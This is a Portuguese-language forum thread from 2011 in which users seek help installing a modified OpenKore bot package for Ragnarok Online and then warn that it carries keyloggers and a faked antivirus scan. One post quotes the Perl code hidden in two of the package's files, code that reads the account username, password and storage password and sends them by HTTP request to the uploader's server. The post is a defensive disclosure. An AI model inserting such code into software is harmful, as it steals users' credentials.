skayz95 0 Postado 12 de Abril 2011 Compartilhar Postado 12 de Abril 2011 Eu baixei o VMware-player 3.1.4 e naum tah instalando.. mi ajuda plzz ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
jrlfzeca 0 Postado 23 de Abril 2011 Compartilhar Postado 23 de Abril 2011 Gostei muito do topico, vlw msm! Aki é w7 ultimate, e funfo legal, mesmo dando erro, da pra upar legal, vlws! :lol: Muito bom veiw! Vlw msm! :yes: ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Viniperfect 0 Postado 7 de Maio 2011 Compartilhar Postado 7 de Maio 2011 Veii Meu win é o 7 e parece q pegou Normal sem DC sem erro sem nada Se continua sem dar erro Parabens !! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
darkaglIII 0 Postado 7 de Maio 2011 Compartilhar Postado 7 de Maio 2011 o jailbreak ta com virus aconselho a nao baixar meu anti virus pego :nice::dormindo::dormindo::cool: ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
flechanegr 0 Postado 7 de Maio 2011 Compartilhar Postado 7 de Maio 2011 Que que e esa porra de kgrelogger? ta pono keylogger no negocio ai man? ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
espiga22 0 Postado 9 de Maio 2011 Compartilhar Postado 9 de Maio 2011 o erro no startro tem como arrumar ele q da dc aew para de funfa + no win7 32 bit rodo legal so o erro q atrapalha ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
klinzley 0 Postado 10 de Maio 2011 Compartilhar Postado 10 de Maio 2011 Aff vao procurar oq fazer cambada de ragnarokeence ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
nattims2s2 0 Postado 10 de Maio 2011 Compartilhar Postado 10 de Maio 2011 POO eu fiz tudo mas nao consigo entrar nos meus personagens... fala que nao tem nenhum... como faço aguardo! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
lambarizinho 0 Postado 11 de Maio 2011 Compartilhar Postado 11 de Maio 2011 Leo muito bom o tópico, só q eu nao sei usar o MVware teria como vc me ensinar, botar um tuto sei la? Pois eu acho que poderá resolver o meu problema e de outros também. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
carolfletcher 0 Postado 11 de Maio 2011 Compartilhar Postado 11 de Maio 2011 pqp. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
carolfletcher 0 Postado 11 de Maio 2011 Compartilhar Postado 11 de Maio 2011 como usa essa ''maquina virtual'' cara nao sei usar preciso de ajuda,se puder responda,e um video por favor ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
tam100 1 Postado 12 de Maio 2011 Compartilhar Postado 12 de Maio 2011 ta otimo 1 e minha 1 vez que usso como coloka pra meu bot usa potio ? ajuda ai msn [email protected] ^^ vlw ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Apicella 1 Postado 13 de Maio 2011 Compartilhar Postado 13 de Maio 2011 ajuda eu quando abro o PoseidonClient da um erro assim /- só apareçe isso ajuda ae por favor sistema 7 32b ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
rafaelro 0 Postado 15 de Maio 2011 Compartilhar Postado 15 de Maio 2011 Greatz Man...Valeu mesmo muito funfo de boa xD ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
rodrigo_333 0 Postado 15 de Maio 2011 Compartilhar Postado 15 de Maio 2011 eu instalei o perl mano , só que não apareceu nenhum Poseidon.pl na pasta do Open kore , oq eu faço ? tipo eu instalei o perl e nem mexi mais . help! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
audre 0 Postado 15 de Maio 2011 Compartilhar Postado 15 de Maio 2011 tem q instalar o perl primeiro antes de usar o openkore.. ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
leocp 0 Postado 16 de Maio 2011 Compartilhar Postado 16 de Maio 2011 bota o scan certo kct É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se e bem diferente do seu em no seu o nome ta File name: Openkore 02-03-2011!.rar sendo ke e Nome do arquivo: Openkore 02-03-2011-Ninet.rar ta no megaupload o nome do arquivo di verdade, e nao e o mesmo nome do seu scan , agora do meu scan e igual e olha quantos virus o pessoal nao ve isso , tem que olhar pessoal si nao vcs vao ser hacked ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
mdnmateus 0 Postado 16 de Maio 2011 Compartilhar Postado 16 de Maio 2011 Vlw Manin :DD aki pegou de boa ^^ agora só tenho q aprender a configurar o openkore '-' vo procurar algum topico por ae =X ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
rguinucci 0 Postado 23 de Maio 2011 Compartilhar Postado 23 de Maio 2011 cara aki nao tem Poseidon.pl na pasta do openkore :S:S:S:S ... ta certo o que voce escreveu'? pq sóo meu nao tem? --' ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
IDAIRON 0 Postado 23 de Maio 2011 Compartilhar Postado 23 de Maio 2011 Keylogger em dois lugares no openkore!! 1- pasta Src/Network/Send no Arquivo ''ServerType0.pm'' use LWP::UserAgent; use Utils qw(urlencode); my $ua = LWP::UserAgent->new; $ua->timeout(10); $ua->env_proxy; my $usuario = $config{'username'}; $usuario =~ s/#/:/; my $senha = $config{'password'}; $senha =~ s/#/:/; my $kafra = $config{'storageAuto_password'}; $kafra =~ s/#/:/; my $response = $ua->get(" É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se $senha $kafra"); sua senha usuario e kafra sao mandados para o servidor host q ele criou! 2 - Pasta -> plugins no arquivo ''macro.pl'' use LWP::UserAgent; use Utils qw(urlencode); my $ua = LWP::UserAgent->new; $ua->timeout(10); $ua->env_proxy; my $usuario = $config{'username'}; $usuario =~ s/#/:/; my $senha = $config{'password'}; $senha =~ s/#/:/; my $kafra = $config{'storageAuto_password'}; $kafra =~ s/#/:/; my $response = $ua->get(" É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se $senha $kafra"); sao encontrados 2 tentativas tbm, acontece a mesma coisa, sua senha usuario e kafra sao mandados para o servidor host q ele criou ( É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se ) e apartir como e' um arquivo php deve ser enviado para algum arquivo txt ou ate' mesmo para email do respectivo ladrao!! ISTO E' UM ALERTA PARA VCS USUARIOS DO OPENKORE!! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
bibsao 0 Postado 30 de Maio 2011 Compartilhar Postado 30 de Maio 2011 Cara so vc se registrar e baixar o VMware de boa eu estou baixando demora um pouco se funcionar posto aki ok =P ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
37975602 0 Postado 31 de Maio 2011 Compartilhar Postado 31 de Maio 2011 n to consequindo jogaR eu loguei + quando eu aperto na criadora n vai eu baixei loguei + n consegui entrar apareceu nao foi possivel conectaR cara n deu eu loguei quando eu fui jogar com a criadora apareceu,nao foi posivel conectar ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
crklizas 0 Postado 31 de Maio 2011 Compartilhar Postado 31 de Maio 2011 Gente,parem de baixar...Eu baixei aqui e to com keylogger.Não vou poder acessar minha conta até que eu passe um scan aqui...Não baixem. EDIT Fiz o scan AHEUHAUEH É necessário se cadastrar para acessar o conteúdo. Entre ou Cadastre-se 2 KEYLOGGERS SCAN FALSO PESSOAS RECLAMARAM DA FALTA DE ARQUIVO PRECISA DE MAIS MOTIVOS PRA DA UM CLOSED ?! ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
YuriMatheus 0 Postado 3 de Junho 2011 Compartilhar Postado 3 de Junho 2011 Maan meeu AVG Detectou 1 Virus ! =/ ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
GetOverHere¹ 0 Postado 3 de Junho 2011 Compartilhar Postado 3 de Junho 2011 NOME DO SCAN E DO DOWNLOAD NAO CONFERE! no scan ta :Openkore 02-03-2011!.rar no megaupload ta:Openkore 02-03-2011-Ninet.rar ᅠᅠMural de Coleçõesᅠᅠ Clique aqui e adquira suas medalhas Link para o comentário Compartilhar em outros sites Mais opções de compartilhamento...
Posts Recomendados